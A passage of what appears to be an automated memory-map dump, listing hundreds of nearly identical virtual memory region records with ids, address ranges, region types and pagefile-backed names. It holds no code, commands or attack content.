entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 4446 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4447 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4448 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4449 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4450 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4451 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4452 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4453 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4454 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4455 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4456 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4457 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4458 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4459 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4460 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4461 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4462 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4463 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4464 start_va = 0x2a0000 
end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4465 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4466 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4467 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4468 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4469 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4470 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4471 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4472 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4473 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4474 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4475 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4476 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4477 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4478 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4479 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4480 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4481 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4482 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4483 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4484 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4485 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4486 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4487 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4488 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4489 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 4490 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4491 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4492 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4493 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4494 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4495 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4496 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4497 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 4498 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4499 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4500 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4501 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4502 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 4503 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4504 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4505 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4506 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4507 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4508 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4509 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4510 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4511 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4512 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4513 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4514 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4515 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 4516 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4517 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4518 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4519 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4520 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4521 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4522 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4523 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4524 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4525 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4526 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4607 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4608 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4609 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4610 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4611 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4612 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4613 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4614 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4615 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4616 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4617 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4618 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4619 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4620 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4621 start_va = 0x2a0000 end_va = 0x2affff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4622 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4623 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4624 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4625 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4626 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4627 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4628 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4762 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4763 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4764 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 4765 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4766 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4767 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4768 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4769 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4770 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4771 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4772 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4773 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4774 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4775 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4776 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4777 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4778 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4779 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4780 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4781 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4782 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4783 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4784 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4785 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4786 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4787 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4788 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4789 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4790 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4791 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4792 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4793 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4794 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4795 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4796 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4797 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4798 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4799 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4800 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4801 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4807 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4808 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4809 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4810 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 4811 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4812 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4813 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4814 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4815 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4816 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4819 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4820 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 4821 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 4822 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 4824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4830 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4831 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4832 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4833 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4834 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4835 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4836 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 4837 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4838 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4839 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4840 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4841 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4842 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4843 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4844 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4845 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4846 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4847 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4848 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4849 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4850 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4851 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4852 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4853 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4854 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4855 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4856 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4857 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4858 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4859 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4860 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = 